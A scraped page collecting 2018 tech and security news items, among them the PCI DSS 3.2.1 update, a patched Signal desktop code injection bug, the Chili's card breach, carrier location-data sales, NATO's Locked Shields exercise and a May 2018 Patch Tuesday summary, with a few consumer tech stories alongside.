PCI DSS Version 3.2.1 Published by PCI Security Standards Council

The Payment Card Industry Security Standards Council (PCI SSC) published a minor revision to version 3.2 of its Data Security Standard (PCI DSS).

On 17 May, PCI SSC published PCI DSS version 3.2.1. The purpose of the update was to clarify organizations’ use of the Standard and when they would need to upgrade their use of common cryptographic protocols. PCI SSC Chief Technology Officer Troy Leach expanded on the motive for the Standard’s revision in a press release:

This update is designed to eliminate any confusion around effective dates for PCI DSS requirements introduced in v3.2, as well as the migration dates for SSL/early TLS. It is critically important that organizations disable SSL/early TLS and upgrade to a secure alternative to safeguard their payment data.

In version 3.2.1, PCI SSC specifically removed notes referring to 1 February 2018 as an application deadline. It also updated the Standard’s requirements and Appendix A2 to limit the use of Secure Sockets Layer (SSL)/early-Transport Layer Security (TLS) to only point-of-sale point-of-interaction (POS POI) terminals and their service provider connection points after 30 June 2018.

Another important change involved the removal of multi-factor authentication (MFA) as a compensating control example in Appendix B of the standard. PCI SSC made this update to reflect the fact that all non-console administrative access now requires MFA, with one-time passwords serving as an effective alternate control in these scenarios.

The Security Standards Council enacted a few additional updates. It included a link to its Document Library so that organizations can learn more about the changes.

Without any requirements included in version 3.2.1, organizations can continue to use PCI DSS version 3.2 through 31 December 2018. If they decide to do so, they should familiarize with some of the key challenges of achieving compliance with this version and how they can overcome them.


via:  tripwire


Save pagePDF pageEmail pagePrint page

Signal Patches Code Injection Bug that Enabled Remote Code Execution

Signal patched a code injection vulnerability that by some means of exploitation enabled attackers to achieve remote code execution.

The security team for the encrypted communications app, a program which has been available for both Android and iOS since November 2015, published a fix for the bug just hours after first being contacted by a group of security researchers.

Iván Ariel Barrera Oro, Alfredo Ortega and Juliano Rizzo with assistance from Javier Lorenzo Carlos Smaldone accidentally discovered the vulnerability on 10 May. They were passing XSS payloads back and forth when one of the packages triggered in Signal’s desktop version. Further investigation confirmed that the weakness worked on different platforms including Linux, Windows and macOs.

Iván Ariel Barrera Oro shared additional details about the vulnerability in a blog post:

We tried different kinds of HTML elements: img, form, script, object, frame, framset, iframe, sound, video (this last two where funny). They all worked, except that CSP blocked the execution of scripts, which halted in some way this attack. Inside iframes, everything was possible, even loading code from an SMB share!. This enables an attacker to execute remote code without caring about CSP. Juliano worked on this with Alfredo, along with trying to get a manageable segmentation fault.


Shortly after publishing the above Twitter notification on 11 May, the security researchers reached out to Signal. The encrypted messaging app’s security folks confirmed they were working on a patch two hours later. It took just another hour more for Signal’s security team to release a patch.

Iván Ariel Barrera Oro was surprised at how quickly Signal released the fix, especially given its size. He therefore decided to have a look at the patch file’s history. It’s then that he discovered that the messaging app had previously created the fix but had removed it on 10 April to fix an linking issue.

The security researcher admitted he still has his doubts about the patch file:

I’m still not convinced about that regex and I’m afraid someone might exploit it, specially those resourceful three-letter agencies….

Signal users should consider updating their software as soon as possible.


via:  tripwire

Save pagePDF pageEmail pagePrint page

Chili’s Restaurants Suffered Payment Card Data Security Incident

Some Chili’s restaurant locations suffered a data security incident that might have compromised customers’ payment card details.

Brinker International, a Dallas-based multinational hospitality industry company which operates 1,600 Chili’s restaurants, said it learned of the incident on 11 May. It provided additional details about the event in a press release:

…We believe that malware was used to gather payment card information including credit or debit card numbers as well as cardholder names from our payment-related systems for in-restaurant purchases at certain Chili’s restaurants. Currently, we believe the data incident was limited to between March – April 2018….

The parent company further explained that Chili’s does not store customers’ Social Security Numbers, dates of birth or other pieces of sensitive information.

To address the incident, Brinker revealed it’s currently working with third-party forensic experts. It articulated its hopes that their analysis will reveal how the instance of unauthorized access on Chili’s payment systems occurred as well as how many many Chili’s locations and customers the incident affected. Additionally, the company pledged to cooperate with law enforcement, which it notified of the incident.

In the meantime, the hospitality organization made public that it’s working to set up identity theft and credit monitoring services for affected Chili’s customers. It also said that it will post any new information of which it learns to its incident disclosure notice.


Customers who used their payment cards at a Chili’s restaurant between March and April 2018 should consider monitoring their bank and credit card statements closely. If they detect any suspicious transactions, they should notify their financial institution and/or card issuer as soon as possible along with local police and the FTC. They might also consider placing a security freeze or fraud alert on their credit reports.

News of this incident places Chili’s on a growing list of restaurants that have suffered data security incidents affecting customers’ payment cards. Those victims include Applebee’s, Shoney’s and Arby’s.

To help protect themselves against similar security events, organizations should consider how they can strengthen the security of their point-of-sale (POS) systems.


via:  tripwire

Save pagePDF pageEmail pagePrint page

US cell carriers are selling access to your real-time phone location data

The company embroiled in a privacy row has “direct connections” to all major US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint — and Canadian cell networks, too.

Four of the largest cell giants in the US are selling your real-time location data to a company that you’ve probably never heard about before.

In case you missed it, a senator last week sent a letter demanding the Federal Communications Commission (FCC) investigate why Securus, a prison technology company, can track any phone “within seconds” by using data obtained from the country’s largest cell giants, including AT&T, Verizon, T-Mobile, and Sprint, through an intermediary, LocationSmart.

The story blew up because a former police sheriff snooped on phone location data without a warrant, according The New York Times. The sheriff has pleaded not guilty to charges of unlawful surveillance.

Yet little is known about how LocationSmart obtained the real-time location data on millions of Americans, how the required consent from cell user owners was obtained, and who else has access to the data.

Kevin Bankston, director of New America’s Open Technology Institute, explained in a phone call that the Electronic Communications Privacy Act only restricts telecom companies from disclosing data to the government. It doesn’t restrict disclosure to other companies, who then may disclose that same data to the government.

He called that loophole “one of the biggest gaps in US privacy law.”

“The issue doesn’t appear to have been directly litigated before, but because of the way that the law only restricts disclosures by these types of companies to government, my fear is that they would argue that they can do a pass-through arrangement like this,” he said.

LocationSmart, a California-based technology company, is one of a handful of so-called data aggregators. It claimed to have “direct connections” to cell carrier networks to obtain real-time cell phone location data from nearby cell towers. It’s less accurate than using GPS, but cell tower data won’t drain a phone battery and doesn’t require a user to install an app. Verizon, one of many cell carriers that sells access to its vast amounts of customer location data, counts LocationSmart as a close partner.

The company boasts coverage of 95 percent of the country, thanks to its access to all the major US carriers, including US Cellular, Virgin, Boost, and MetroPCS, as well as Canadian carriers, like Bell, Rogers, and Telus.

“We utilize the same technology used to enable emergency assistance and this includes cell tower and cell sector location, assisted GPS and cell tower trilateration,” said a case study on the company’s website.

“With these location sources, we are able to locate virtually any US based mobile devices,” the company claimed.

A person’s precise location can be returned in as little as 15 seconds, according to another case study, and data is usually not cached for longer than two minutes.

Other companies then buy access to LocationSmart’s data — or the data is obtained by a customer of LocationSmart, like 3Cinteractive, which is said to have supplied location data to Securus.

But LocationSmart hasn’t said how it ensures its corporate customers protect the location data to prevent abuse and misuse. A spokesperson for LocationSmart did not return an email with several questions sent prior to publication.

Companies buy into LocationSmart’s location data for many reasons. Sometimes it’s to help locate a nearby store, or to send a marketing text message when a person visits a rival store. Location data can even be used by companies to track deliveries or shipments, or by banks to fight fraud, such as if a person is making card transactions miles apart within just a few minutes of each other.

In any case, the company requires explicit consent from the user before their location data can be used, by sending a one-time text message or allowing a user to hit a button in an app.

LocationSmart also said it allows some customers to obtain “implied” consent, used on a case-by-case basis, when “the nature of the service implies that location will be used.” The company said one example could be when a stranded motorist calls roadside assistance, and the event implies the person is “calling to be found.”

The company even has its own “try-before-you-buy” page that lets you test the accuracy of its data. With a colleague’s consent, we tracked his phone to within a city block of his actual location.

(Screenshot: ZDNet)

The data aggregator said it has access to carrier network location data “because privacy is built into its cloud-based platform.”

While that may be true, the requirement to obtain a person’s consent collapses if a search warrant for that data is issued. That’s exactly how companies like Securus can reveal location data without asking a person’s permission.

According to a Nebraska state government document, an application “can also be configured — with carrier approval and appropriate warrant documentation — to retrieve location data without the user opting-in.” Securus was able to return real-time location data on users without their consent because the system required a valid order be submitted first.

However, as the The New York Times reported, Securus never verified orders before spitting back results.

We reached out to the four major US carriers prior to publication. We asked how each carrier obtains consent from customers to sell their data and what safeguards they put in place to prevent abuse.

Sprint spokesperson Lisa Belot said the company shares personally identifiable location data “only with customer consent or in response to a lawful request such as a validated court order from law enforcement.”

The company’s privacy policy, which governs customer consent, said third-parties may collect customers’ personal data, “including location information.”

Sprint said the company’s relationship with Securus “does not include data sharing,” and is limited “to supporting efforts to curb unlawful use of contraband cell phones in correctional facilities.”

When asked the same questions, Verizon spokesperson Rich Young provided a boilerplate response regarding Securus and would not comment further.

“We’re still trying to verify their activities, but if this company is, in fact, doing this with our customers’ data, we will take steps to stop it,” he said.

AT&T spokesperson Jim Greer said in a statement: “We have a best practices approach to handling our customers’ data. We are aware of the letter and will provide a response.” Our questions were also not answered.

A spokesperson for T-Mobile did not respond by our deadline.

“It’s important for us to close off that potential loophole and that can easily be done with one line of legislative language,” said Bankston, “which would also have the benefit of making every other company careful about always getting consent before disclosing your data to anyone.”

Ron Wyden, a Democratic senator from Oregon, called on each carrier to stop sharing data with third parties. Wyden argued the sharing “skirts wireless carriers’ legal obligation to be the sole conduit by which the government may conduct surveillance of Americans’ phone records.”

In a blog post, Electronic Frontier Foundation (EFF) said law enforcement may be violating the law by not seeking data directly from the phone carriers. “Law enforcement shouldn’t have unfettered access to this data, whether they get it from Securus or directly from the phone companies,” said the EFF.

Wyden has also called on the FCC to investigate the carriers for allegedly not obtaining user consent.

The FCC has not said yet if it will investigate.


via:  zdnet

Save pagePDF pageEmail pagePrint page

NATO Exercise Tests Skills of National Cyber Defenders

More than 1,000 experts from nearly 30 countries have tested their ability to protect IT systems and critical infrastructure networks at NATO’s Locked Shields 2018 live-fire cyber defense exercise.

A total of 22 Blue Teams took part in the exercise, including representatives of NATO, the European Union, the United States, the United Kingdom, Estonia, Finland, Sweden, Latvia, France, the Czech Republic, and South Korea.

Locked Shields, organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) since 2010, took place on April 23-26 in Tallinn, Estonia, and it was won by a 30-member team representing NATO. Teams from France and the Czech Republic finished in second and third place, respectively.

The exercise tested not only the technical abilities of national cyber defense teams when faced with a severe attack, but also their decision-making skills, including cooperation with other teams.

The drill was based on a scenario involving a fictional country named Berylia, which got hit by a number of hostile events and coordinated cyberattacks targeting a civilian Internet services provider and a military airbase. The attacks disrupted the power grid, drones, 4G public safety networks, and other critical infrastructure.

Locked Shields involved 4,000 virtualized systems and over 2,500 attacks. Participants were tasked with maintaining complex IT systems while completing a wide range of tasks, including reporting incidents, making strategic decisions, and conducting forensic investigations.

“The exercise serves as a valuable platform for senior decision-makers to practice the coordination required to address complex cyber incidents, both internally and internationally. In the strategic game of Locked Shields Blue Teams had to determine at what level the information should be shared, who has the authority to make a decision and give guidelines, what are the potential legal implications,” said Cdr. Michael Widmann, chief of the NATO CCDCOE Strategy Branch.

“Overall the exercise was a success. Teams coordinated in a complex and dynamic environment and addressed key issues necessary to endure intense cyber attack,” Widmann added.


via:  securityweek

Save pagePDF pageEmail pagePrint page

All About Peerlyst, a Thriving Online Platform for Cybersecurity Professionals

Great article from Kim Crawley about a platform I like a lot.



I am very proud to contribute to both Tripwire’s the State of Security and to be a regular Peerlyst poster. Peerlyst is a very important online platform for cybersecurity professionals.

It’s my pleasure to speak with Limor Elbaz, Peerlyst’s CEO and founder. She shared with me some excellent insight about what inspired her to start Peerlyst and what makes the platform stand out from the crowd.

Kim Crawley: What inspired you to establish Peerlyst?

Limor Elbaz: My entire career was in security, from the Israeli army through starting Sansa Security, which delivered a crypto engine that is now embedded on every iPhone and Samsung phone, through starting the virus lab at Finjan and creating new products in alliances with companies like McAfee and Trend Micro. In my last gig, I was VP of corp dev at Imperva/Incapsula.

In all these roles, I’ve watched the challenge of security professionals learning, sharing knowledge, consulting with peers and the inherent conflict between security professionals and vendors. Security products are vital for the work of protecting an organization, yet most of the threat education comes from companies making those products or companies paid by them. I wanted to create a place where security professionals (and later, more IT people) will be able to share knowledge, educate and get educated, do a better job, and of course advance their career.

Along the way, we learnt that we can help vendors too by giving them a focused stage for education while keeping the quality high and not harming the users’ experience. We’re also learning that we can help recruiters fill security jobs without spending hours on interviewing irrelevant candidates.

KC: What’s the story of Peerlyst?

LE: We started by building a comprehensive algorithm to detect product names and the security taxonomy (security tags). We launched a prototype at the end of 2014 at Black Hat in Vegas, making a call to users to come and discuss products by writing reviews. Very quickly, dozens of users asked us to blog on Peerlyst’s behalf, and we realized that security professionals want to talk not only about products but also about many security topics.

The format became less rigid, and users started to create blogs and discussions, resources and even tools. In March 2016, we launched a comprehensive new site, using a new stack (Meteor.JS, MongoDB, React.JS). Users now have rich profiles, reputation building, the ability to follow anything (companies, products, people, tags), and sophisticated feeds of content.

Peerlyst now hosts an enormous amount of how-to’s that were co-created by the community, training, panels, meetups around the world and a comprehensive security calendar, all maintained by the community. A typical user would follow topics of interest, people, companies and products, and they would get a very personalized feed of content generated by the community as well as several external news. Users get invited to posts related to their expertise and interests as well as to relevant jobs.

This makes more than half a million of security professionals come to Peerlyst regularly, with a high engagement rate, long sessions and a healthy dynamic of crowdsourcing content. Users on Peerlyst are now creating thousands of security wikis. They even created ebooks that are a collaborative effort of up to a dozen users each, and they are being offered on Peerlyst, as well as Amazon (The Beginner’s Guide to Information Security, Essentials of Cybersecurity, Essentials of Enterprise Network Security, The complete WarBerryPi and more).

Next, we created Secure Drop, which is a system based on Freedom of the Press where users on Peerlyst can drop information completely anonymously, and we’re one of the first organizations to expose the 200 million breached Equifax records. This initiative evolved into nosecrets.peerlyst.com, where all this breach data is hosted in one database and users can look for records containing their data, and act on it.

KC: How does Peerlyst benefit the cybersecurity community?

LE: We’re addressing a few problems that block security professionals from doing their job and advancing their career:

  1. Inefficient knowledge flow. Vendors and analysts are good at creating educational content because they have research teams, yet not every organization can afford a subscription with an analyst firm.
  2. Formal security education and certifications are quite expensive. Peerlyst offers free peer-based training, as well as an extensive mentoring program.
  3. Security people don’t get to talk to their peers often enough. Physical events, like conferences and round tables, are not enough.

Peerlyst eliminates the barriers of information flow, enabling anyone to learn and advance their career, by accessing thousands of crowd-sourced resources, connecting with the top experts without barriers and discovering the latest trends without checking dozens of resources. Peerlyst also gives everyone an opportunity to demonstrate their own expertise in their own way and at their own pace. Thus advancing everyone’s reputation and career.

KC: What types of posts are really well received?

LE: The best posts on Peerlyst are resources, which are posts that teach a skill or guide others. For example, how to perform a security task, how to acquire a specific cybersecurity role, or how to get a certification or skill. Peerlyst often creates a placeholder post, and the community builds it out. Check out this for example, a resource that was used over 50,000 times: How To Build And Run A SOC for Incident Response – A Collection Of Resources.

KC: How can companies benefit from partnering with Peerlyst?

LE: We partner with several types of companies:

  1. We syndicate content to external magazines that give our authors the credit and link.
  2. We partner with excellent writers to create awesome content for the community.
  3. Vendors can partner with Peerlyst by becoming members of our vendor community. A vendor membership sponsors the site but also allows the vendor to create a listing for the product and promote content to users in a way that is based on actual interests. (Vendors cannot buy impressions on Peerlyst. Content is distributed based on interest only to make sure that the user experience is intact.)

We welcome more ideas, wishes and feedback. Peerlyst was truly made by the community in most aspects. We are only the facilitators.


via:  tripwire

Save pagePDF pageEmail pagePrint page

Verizon stealthily launched a startup offering $40-per-month unlimited data, messaging and minutes

Earlier this year, Verizon quietly launched a new startup called Visible, offering unlimited data, minutes, and messaging services for the low, low price of $40.

To subscribe for the service, users simply download the Visible app (currently available only on iOS) and register. Right now, subscriptions are invitation only and would-be subscribers have to get an invitation from someone who’s already a current Visible member.

Once registration is complete, Visible will send a sim card the next day, and, once installed, a user can access Verizon’s 4G LTE network to stream videos, send texts, and make calls as much as their heart desires.

Visible says there’s no throttling at the end of the month and subscribers can pay using internet-based payment services like PayPal and Venmo (which is owned by PayPal).

The service is only available on unlocked devices — and right now, pretty much only to iPhone users.

“This is something that’s been the seed of an idea for a year or so,” says Minjae Ormes, head of marketing at Visible. “There’s a core group of people from the strategy side. There’s a core group of five or ten people who came up with the idea.”

The company wouldn’t say how much Verizon gave to the business to get it off the ground, but the leadership team is comprised mostly of former employees, like Miguel Quiroga the company’s chief executive.

“The way I would think about it.. we are a phone service in the platform that enables everything that you do. The way we launched and the app messaging piece of it. You do everything else on your phone and a lot of time if you ask people your phone is your life,” said Ormes. The thinking was, “let’s give you a phone that you can activate right from your phone and get ready to go and see how it resonates.”

It’s an interesting move from our corporate overlord (Verizon owns Oath, which owns TechCrunch), which is already the top dog in wireless services, with some 150 million subscribers compared with AT&T’s 141.6 million and a soon-to-be-combined Sprint and T-Mobile subscriber base of 126.2 million.

For Verizon, the new company is likely about holding off attrition. The company shed 24,000 postpaid phone connections in the last quarter, according to The Wall Street Journal, which put some pressure on its customer base (but not really all that much).

Mobile telecommunications remain at the core of Verizon’s business plans for the future, even as other carriers like AT&T look to dive deeper into content (while Go90 has been a flop, Verizon hasn’t given up on content plans entirely). The acquisition of Oath added about $1.2 billion in brand revenue (?) to Verizon for the last quarter, but it’s not anywhere near the kind of media juggernaut that AT&T would get through the TimeWarner acquisition.

Verizon seems to be looking to its other mobile services, through connected devices, industrial equipment, autonomous vehicles, and the development of its 5G network for future growth.

Every wireless carrier is pushing hard to develop 5G technologies, which should see nationwide rollout by the end of this year. Verizon recently completed its 11 city trial-run and is banking on expansion of the network’s capabilities to drive new services.

As the Motely Fool noted, all of this comes as Verizon adds new networking capabilities for industrial and commercial applications through its Verizon Connect division — formed in part from the $2.4 billion acquisition of Fleetmatics, that Verizon bought in 2016 along with Telogis, Sensity Systems, and LQD Wifi to beef up its mobile device connectivity services.

Meanwhile, upstart entrants to challenge big wireless carriers are coming from all quarters. In 2015, Google launched its own wireless service, Project Fi, to compete with traditional carriers and Business Insider just covered another would-be wireless warrior, Wing .

Founded by the team that created the media site Elite Daily, Wing uses Sprint cell-phone towers to deliver its service.

David Arabov and co-founder Jonathan Francis didn’t take long after taking a $26 million payout for their previous business before getting right back into the startup fray. Unlike Visible, Wing isn’t a one-size-fits-all plan and it’s a much more traditional MVNO. The company has a range of plans starting at $17 for a flip-phone and increasing to an unlimited plan at $27 per month, according to the company’s website.

As carriers continue to face complaints over service fees, locked in contracts, and terrible options, new options are bound to emerge. In this instance, it looks like Verizon is trying to make itself into one of those carriers.


via:  techcrunch

Save pagePDF pageEmail pagePrint page

$23 kids’ book selection, in its first physical Prime book service

Along with the higher price that Amazon is introducing to Prime this month, the company is also bringing another first to its membership service: physical books. The company now has a new product called Prime Book Box, a subscription service for children’s hardback books, selected by Amazon editors, sold as part of its Prime tier. You can register now for an invite for when it starts to ship later this year, starting in the U.S.

Pricing is $22.99 per box, which Amazon says works out to 35 percent below the cumulative list price for the books, and you can subscribe for books to come in one-, two- or three-month intervals. Books are divided up by age groups of baby-two years, three-five years, six-eight years and nine-12 years, with sample titles including If Animals Kissed Good Night, A Sick Day for Amos McGee, The Willoughbys, and Arlo Finch in the Valley of Fire.

All books are hardcover, and you can opt either for four board books for kids aged two and younger, or two picture books or novels for older children.

“These books include classics that have stood the test of time as well as hidden gems that our Editors couldn’t put down—stories that your reader can enjoy again and again. We will also use your recent purchase history to avoid including a book you have already purchased on Amazon.com,” Amazon notes in its FAQ about the service.



Prime already has a reading service called Prime Reading, but it is focused around Kindle e-books, along with selected digital magazines and travel guides.

The idea of bringing out a physical book service specifically for children is notable. Parents are more likely to buy (and get gifted) physical picture books and young adult novels rather than e-books as presents, and so kids often build up libraries of these. It also could be a helpful fillip to those of us out there who are trying to figure out engaging ways of reducing screen time for offspring.

“We want to help Prime members discover great children’s books that will inspire a love of reading,” a spokesperson told TechCrunch.

It’s also a clever way of introducing younger people to using Amazon, and also for Amazon to start developing reading profiles for others in your household besides you the Amazon account holder.

This is not an insignificant data play in that regard: today, Amazon can only make approximations about which books and products are for whom in a household, and even then can only vaguely guess as to who else lives at your address and orders using your account. This is a way for the company to start building more specific profiles, and doubtless the company already has extensive algorithms to suggest what other kinds of products a reader of, say, Madeline L’Engle, might also like to be recommended.

For now, though, the more immediate impression I have here also is that Amazon is not quite giving up on physical books just yet.

Some details that you might not see on the landing page but are notable for how this will work: customers will be able to review each box before it ships and tailor it by swapping books from a curated list, which is one way of avoiding duplicates of books you might already have.

Although books are a very common gift for children, currently you won’t be able to gift Prime Book Box subscriptions, “but we’re always innovating on behalf of customers,” the spokesperson said, so this could be something the company plans to explore down the line.


via:  techcrunch

Save pagePDF pageEmail pagePrint page

Danish Capital Area Bikes System Goes Down due to Hacking Attack

The computer system for the Danish capital area city bikes program went offline as a result of a malicious hacking attack.

On 5 May, the administrators of Bycyklen posted a statement informing the public of a hack that occurred sometime over the previous evening:

Everything was erased and our entire system went down as a result of the malicious action. Since the hacking, we have been working hard to solve the problem, but unfortunately, it’s not something we can fix with a snap of the fingers.

According to the program’s “How to” page, Bycyklen enables residents living in Copenhagen, Frederiksburg and surrounding areas to create an account online or on the Android tablet of one of the program’s 1,860 bikes. They can then authenticate themselves at a station with their username and PIN to rent a bike for an hourly fee. Once they’ve finished using the bike, members of the public must return it to an approved Bycyklen station.

Bycyklen issued two updates regarding the hacking attack on its Facebook page the following day. The first revealed that officials needed to go to the docking stations, manually update each affected bike and then charge them up before members could ride them again. The second urged users to report bikes not located in a docking station in exchange for one hour of free riding time.

After having the weekend to investigate the incident, Bycyklen confirmed in an update posted to its website that the hacking attack had not affected users’ data. Administrators of the program clarified this point by sharing how Bycyklen doesn’t store payment information and records only users’ email addresses, phone numbers and PIN codes protected using “salted password hashing,” a method of encryption which helps keeps passwords secure.

Even so, Bycyklen is urging all users to update their PINs as soon as possible just to be safe.

All bikes operating under Bycyklen were back up and running on 9 May, according to a third announcement made on Facebook.


via:  tripwire

Save pagePDF pageEmail pagePrint page

VERT Threat Alert: May 2018 Patch Tuesday Analysis

Today’s VERT Alert addresses Microsoft’s May 2018 Security Updates. VERT is actively working on coverage for these vulnerabilities and expects to ship ASPL-777 on Wednesday, May 9th.

In-The-Wild & Disclosed CVEs


This privilege escalation vulnerability affecting Win32k could allow an attacker to execute code in kernel mode. According to Microsoft, the newest OS releases aren’t affected, but this is being actively exploited on Windows 7, Windows Server 2008 and Windows Server 2008 R2.

Microsoft has rated this as a 4 on the Exploitability Index (Not affected).

Note: Microsoft has rated this as a 0 (Exploitation Detected) on older software releases.


A vulnerability in VBScript could allow attackers to execute code in the context of the logged in user. This vulnerability could be exploited via certain web browsers or Microsoft Office documents, Microsoft has reported active exploitation of this vulnerability.

Microsoft has rated this as a 0 on the Exploitability Index (Exploitation Detected).


A privilege escalation vulnerability affecting Windows 10 versions 1703 and 1709 as well as Windows Server, version 1709 has been publicly disclosed. A malicious application could take advantage of a flaw in the way the Windows kernel image handles objects in memory in order to execute code with higher privileges.

Microsoft has rated this as a 1 on the Exploitability Index (Exploitation More Likely).


According to Microsoft, this vulnerability only impacts Windows 10 Version 1709 and Windows Server version 1709. It could lead to information disclosure. While this vulnerability alone will not allow for system compromise, it could provide useful information that would further enable compromise.

Microsoft has rated this as a 4 on the Exploitability Index (Not affected).

Note: Microsoft has rated this as a 2 (Exploitation Less Likely) on older software releases.

CVE Breakdown by Tag

While historical Microsoft Security Bulletin groupings are gone, Microsoft vulnerabilities are tagged with an identifier. This list provides a breakdown of the CVEs on a per tag basis.


Other Information

In addition to the Microsoft vulnerabilities included in the May Security Guidance, a security advisory was also made available.


Microsoft released updates for Adobe Flash. These correspond with Adobe Update APSB18-16. This includes a fix for CVE-2018-4944.



via: tripwire

Save pagePDF pageEmail pagePrint page